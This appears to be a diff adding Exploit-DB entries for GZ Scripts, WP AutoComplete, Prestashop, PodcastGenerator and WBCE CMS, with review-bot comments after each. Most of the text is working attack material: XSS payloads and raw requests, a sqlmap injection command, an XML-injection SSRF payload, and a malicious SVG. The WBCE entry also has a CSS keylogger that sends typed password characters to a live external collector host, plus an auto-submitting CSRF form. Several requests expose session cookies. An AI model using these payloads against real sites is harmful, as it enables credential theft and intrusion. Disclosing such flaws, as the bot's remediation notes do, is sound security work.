10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)
XSS Will Fire and Executed on his Browser
[-] Done
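Review bot: The header's `Impact: Manipulate the content of the site` understates what steps 8 to 10 describe, where input from a `[Guest User]` booking form executes in the administrator's Dashboard, Bookings and Invoices views. Please state that impact in the header and list the three admin paths as the places where output encoding is missing. The unnumbered result lines (`XSS Fired on Local User Browser`, `XSS Will Fire and Executed on his Browser`) should be folded into their steps.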

@ -0,0 +1,73 @@
# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/gz-forum-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Release Notes:
Reflected XSS:
The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim's
session token or login credentials
Stored XSS
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
## Reflected XSS
Path: /preview.php
GET 'catid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a
Path: /preview.php
GET 'topicid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2
## Stored XSS
-----------------------------------------------
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"
<script>alert(1)</script>
-----------------------------39829578812616571248381709325--
-----------------------------------------------
POST parameter 'free_name' is vulnerable to XSS
POST parameter 'topic' is vulnerable to XSS
POST parameter 'topic_message' is vulnerable to XSS
## Steps to Reproduce:
1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
2. Inject your [XSS Payload] in "Name"
3. Inject your [XSS Payload] in "Topic Title "
4. Inject your [XSS Payload] in "Topic Message"
5. Submit
4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on
5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
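Review bot: The title names only stored XSS, but the body also documents reflected XSS in the `catid` and `topicid` parameters of `/preview.php`; either retitle or split this into two entries so both are indexed. The steps are misnumbered at the end (`5. Submit` is followed by a second `4.` and `5.`), and the last three items are observed results, not steps.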

@ -0,0 +1,24 @@
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux
---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection
--------------------------------------
How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
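Review bot: The reproduction list is out of order: step 3 refers forward to `step 5`, and steps 1 and 2 describe preconditions, not actions. The header is also inconsistent (`Vendor Homepage:` has no `#` prefix) and gives `Version: <= 1.0.4` with no fixed release, so a reader cannot tell what to upgrade to. Please add the remediation the description implies, that the `q` value must be bound as a query parameter in the `wi_get_search_results` handler.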

@ -0,0 +1,34 @@
# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Stored XSS
------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1
property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------
POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS
## Steps to Reproduce:
1. Surf (as Guest) - Go to any Listed Property
2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS Fired on Local Browser
8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
Note: I think Administration Panel missing a section to Manage [Reviews] on the website
this feature must be added in next Updates [View/Edit/Delete]
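Review bot: The closing note (no admin section to view, edit or delete reviews) is an impact statement and belongs next to the `# Impact:` header line rather than after the steps: without a moderation screen, a payload stored in `username`, `title` or `comment` stays on the property page and the Reviews page. The raw request is also missing its `Host` header and the blank line between the request line and the body, and the header block has no CVE or mitigation line (output-encode the three fields wherever reviews are rendered).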


@ -0,0 +1,79 @@
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to Catalog => Products
2. Select arbitary product
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
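Review bot: The `Cookie:` header in the PoC request contains what look like complete `PHPSESSID` and `PrestaShop-...` session values; replace them with placeholders before publishing. The upload goes to `/admin253irhit4jjbd9gurze/filemanager/upload.php` with a session cookie, so the title and steps should state that a back-office login is required. The step list uses "2." twice, "arbitary" should be "arbitrary", and the SVG body is shown twice where once would do. The write-up never says where the uploaded SVG is served from or in which origin its script runs, which is what a reader needs to judge impact and to mitigate (serve uploads with `Content-Disposition: attachment`, or reject SVG files that contain script).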


@ -0,0 +1,118 @@
#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'
payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
By the way i used localhost.If you have domain, you can use domain.
3.And upload episodes
4. I am listening on port 3132 because I'm observating for incoming requests
nc -lvp 3132
5. And I receive request
request:
POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
Content-Type: image/jpeg
image content blaaahblahasdfjblaaah;sdfblaaahasdf
asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="title"
test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="shortdesc"
test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="date"
2023-07-01
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="time"
17:02
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="longdesc"
test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodenum"
33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="seasonnum"
33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="itunesKeywords"
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="explicit"
no
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authorname"
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authoremail"
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="customtags"
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="token"
vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
------WebKitFormBoundarypRUTcUa48pmEcI6Q--
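Review bot: Step 2 puts the explanatory text "( example :Attacker domain)" inside the quoted value, so it does not match the `payload:` line below it or the `shortdesc` part of the request; keep only the literal value in quotes and move the explanation outside. The `shortdesc` value closes a CDATA section and a `shortdescPG` element, so the root cause is that the field is written into the episode XML without neutralizing `]]>`; state that, and state which code path later fetches the `imgPG` URL, because step 5 ("And I receive request") shows no captured output from the listener. The endpoint is under `/admin/` and the request carries a `PHPSESSID` and a `token`, so mark the issue as authenticated and redact both values.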


@ -0,0 +1,239 @@
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)
'''
<html>
<head>
<title>
Login
</title>
<style>
input[type="password"][value*="q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{
background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{
background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{
background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{
background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{
background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{
background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{
background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{
background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{
background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{
background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{
background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{
background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{
background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{
background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{
background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{
background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{
background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{
background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{
background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{
background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{
background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{
background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{
background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{
background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{
background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{
background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{
background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{
background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{
background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{
background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{
background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{
background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{
background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{
background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{
background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{
background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{
background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{
background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{
background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{
background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{
background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{
background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{
background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{
background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{
background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{
background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{
background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{
background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{
background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{
background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{
background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{
background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{
background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{
background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{
background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{
background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{
background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{
background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{
background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{
background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''
4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close
url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com.
7.We write to html files url
url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8.And create csrf-poc with csrf.poc.generator
<html>
<title>
This CSRF was found by miri
</title>
<body>
<h1>
CSRF POC
</h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
Poc video : https://youtu.be/m-x_rYXTP9E
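Review bot: Every rule in the `<style>` block hard-codes a live third-party collector host (`enflownwx6she.x.pipedream.net`); use a placeholder such as the `https://ATTACKER.com` that step 6 already uses, so that nobody who opens the file sends data to that endpoint. The title says CSRF, but the form in step 8 only posts a `url` field to the login page, and steps 6 and 7 show that the underlying defect is the `url` parameter being followed without validation; the text should say so and make clear that the HTML file has to be uploaded by a logged-in user through Media (steps 1 to 3). The write-up names no fix: restrict `url` to same-site relative paths and stop serving uploaded `.html` files from the application origin. The `Cookie:` value in the step 5 request should be redacted.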


@ -3216,6 +3216,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,dos,hardware,,2013-03-22,2013-03-22,0,OSVDB-91581,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php 24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,dos,hardware,,2013-03-22,2013-03-22,0,OSVDB-91581,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,dos,hardware,,2013-04-19,2015-10-18,1,,,,,,https://www.securityfocus.com/bid/59325/info 38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,dos,hardware,,2013-04-19,2015-10-18,1,,,,,,https://www.securityfocus.com/bid/59325/info
45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,,2018-07-20,2018-07-20,0,CVE-2018-14336,,,,, 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,,2018-07-20,2018-07-20,0,CVE-2018-14336,,,,,
51561,exploits/hardware/dos/51561.py,"TP-Link TL-WR940N V4 - Buffer OverFlow",2023-07-03,"Amirhossein Bahramizadeh",dos,hardware,,2023-07-03,2023-07-03,0,CVE-2023-36355,,,,,
45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80,2018-08-08,2018-08-08,0,,"Denial of Service (DoS)",,,, 45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80,2018-08-08,2018-08-08,0,,"Denial of Service (DoS)",,,,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80,2018-08-16,2018-08-17,0,CVE-2018-15172,"Denial of Service (DoS)",,,, 45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80,2018-08-16,2018-08-17,0,CVE-2018-15172,"Denial of Service (DoS)",,,,
26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,dos,hardware,,2013-07-13,2013-07-13,0,CVE-2013-2784;OSVDB-94940,,,,, 26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,dos,hardware,,2013-07-13,2013-07-13,0,CVE-2013-2784;OSVDB-94940,,,,,
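Review bot: The added row 51561 leaves the tags field empty, while the neighbouring `dos` rows for the same vendor (45168, 45203) carry "Denial of Service (DoS)" in that position; add the matching tag if the entry is classified as a DoS. "Buffer OverFlow" in the description looks like a capitalisation typo for "Buffer Overflow".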
@ -4179,6 +4180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,webapps,hardware,,2013-07-07,2013-07-07,0,OSVDB-94924,,,,,http://www.s3cur1ty.de/advisories 26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,webapps,hardware,,2013-07-07,2013-07-07,0,OSVDB-94924,,,,,http://www.s3cur1ty.de/advisories
